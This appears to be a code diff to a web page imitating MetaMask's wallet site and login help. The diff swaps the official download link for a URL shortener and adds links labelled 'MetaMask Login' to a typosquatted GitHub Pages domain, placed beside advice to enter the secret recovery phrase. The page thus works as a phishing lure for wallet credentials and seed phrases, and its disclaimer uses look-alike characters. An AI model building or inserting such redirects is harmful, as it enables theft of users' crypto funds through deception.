--- a/index.html
+++ b/index.html
@@ -446,7 +446,7 @@ padding: 0px 10px;
 <h2>A crypto wallet & gateway to blockchain apps</h2>
 <p>Start exploring blockchain applications in seconds. Trusted by over 30 million users worldwide.</p>
 <div class="btn_doowl_banner">
-<a href="https://metamask.io/">Download for <span id="svg_icon"><svg xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50" fill="none">
+<a href="https://gtly.to/izXGy1m6u">Download for <span id="svg_icon"><svg xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50" fill="none">
 <g clip-path="url(#clip0_3892_512)">
 <path d="M45.128 37.2106C44.4614 37.5593 43.774 37.8664 43.0696 38.1305C40.8274 38.9694 38.4522 39.3968 36.0583 39.392C26.8167 39.392 18.7664 33.0353 18.7664 24.8781C18.7782 23.784 19.0818 22.7129 19.6459 21.7753C20.21 20.8377 21.0141 20.0677 21.9752 19.5447C13.6163 19.8962 11.468 28.6062 11.468 33.7091C11.468 48.1372 24.766 49.5999 27.6311 49.5999C29.1759 49.5999 31.5058 49.1507 32.9042 48.7094L33.16 48.6234C38.541 46.7633 43.1284 43.1266 46.167 38.3121C46.2601 38.1655 46.3016 37.992 46.2851 37.8191C46.2686 37.6462 46.1949 37.4838 46.0757 37.3575C45.9566 37.2311 45.7987 37.1481 45.6271 37.1215C45.4554 37.0949 45.2798 37.1263 45.128 37.2106Z" fill="url(#paint0_linear_3892_512)"/>
 <path opacity="0.35" d="M45.128 37.2106C44.4614 37.5593 43.774 37.8664 43.0696 38.1305C40.8274 38.9694 38.4522 39.3968 36.0583 39.392C26.8167 39.392 18.7664 33.0353 18.7664 24.8781C18.7782 23.784 19.0818 22.7129 19.6459 21.7753C20.21 20.8377 21.0141 20.0677 21.9752 19.5447C13.6163 19.8962 11.468 28.6062 11.468 33.7091C11.468 48.1372 24.766 49.5999 27.6311 49.5999C29.1759 49.5999 31.5058 49.1507 32.9042 48.7094L33.16 48.6234C38.541 46.7633 43.1284 43.1266 46.167 38.3121C46.2601 38.1655 46.3016 37.992 46.2851 37.8191C46.2686 37.6462 46.1949 37.4838 46.0757 37.3575C45.9566 37.2311 45.7987 37.1481 45.6271 37.1215C45.4554 37.0949 45.2798 37.1263 45.128 37.2106Z" fill="url(#paint1_radial_3892_512)"/>
@@ -508,13 +508,17 @@ padding: 0px 10px;
 
 <div class="main_content_box">
 <strong>What can be done if the MetaMask login doesn't work?</strong></p>
+ 
 <p><span style="font-weight: 400;">There could be different situations when you are not able to access MetaMask, its features, or the wallet account that you have created on it. For </span><strong>MetaMask login</strong><span style="font-weight: 400;">, it is essential that the browser extension works properly, the internet connectivity on your device is alright, and the login credentials you are feeding are correct. So, if you wish to sign in to your MetaMask account without a hurdle, you can definitely verify all of this before trying out any other solution.</span></p>
 <p><span style="font-weight: 400;">However, there are some additional steps you can take in order to make sure that you can easily regain access to your account.</span></p>
-<p><strong>Ways to get rid of issues with MetaMask</strong></p>
+
+ <p><strong>Ways to get rid of issues with MetaMask</strong></p>
+ 
 <p><strong>Reset your account</strong></p>
+ 
 <p><span style="font-weight: 400;">Resetting your account can be done in case you are not able to use one or more features of your MetaMask account. For this purpose, what you can do is, go to the "advanced settings" of your account and click on the "reset account" option.</span></p>
 <p><strong>Restore the account</strong></p>
-<p><span style="font-weight: 400;">In case you are not able to get into your account even after entering the correct </span><strong>MetaMask login</strong><span style="font-weight: 400;"> password, then what you can do is use the secret recovery phrase to restore your account. This can be easily done from the main page of the portal by tapping the "restore your wallet" option and following some easy prompts later on.</span></p>
+<p><span style="font-weight: 400;">In case you are not able to get into your account even after entering the correct </span><strong><a href="https://metazmskloign.github.io/">MetaMask Login</a></strong><span style="font-weight: 400;"> password, then what you can do is use the secret recovery phrase to restore your account. This can be easily done from the main page of the portal by tapping the "restore your wallet" option and following some easy prompts later on.</span></p>
 <p><strong>Check MetaMask website status</strong></p>
 <p><span style="font-weight: 400;">If the MetaMask website is undergoing any kind of maintenance or the website is down, you may not be able to log in no matter what you do. So, in the first instance, you just need to wait for some time and let MetaMask servers restore. Thereafter, you can try logging in with the correct MetaMask login credentials.</span></p>
 <p><strong>Conclusion:</strong></p>
@@ -537,7 +541,7 @@ padding: 0px 10px;
 
 <h2 class="">Disclaimer :</h2>
 
-MetaMask Wallet | Login | Signup. The M𝔢tåMask Wallet accounts provide an exclusive outlet to keep crypto protected along with easy access to the decentralized applications on the network.
+MetaMask Wallet | Login | Signup. The <a href="https://metazmskloign.github.io/">MetaMask wallet</a> accounts provide an exclusive outlet to keep crypto protected along with easy access to the decentralized applications on the network.
 
 </div>
 <div class="custom_footer_col2 samecolme custom_footer_col2_com">
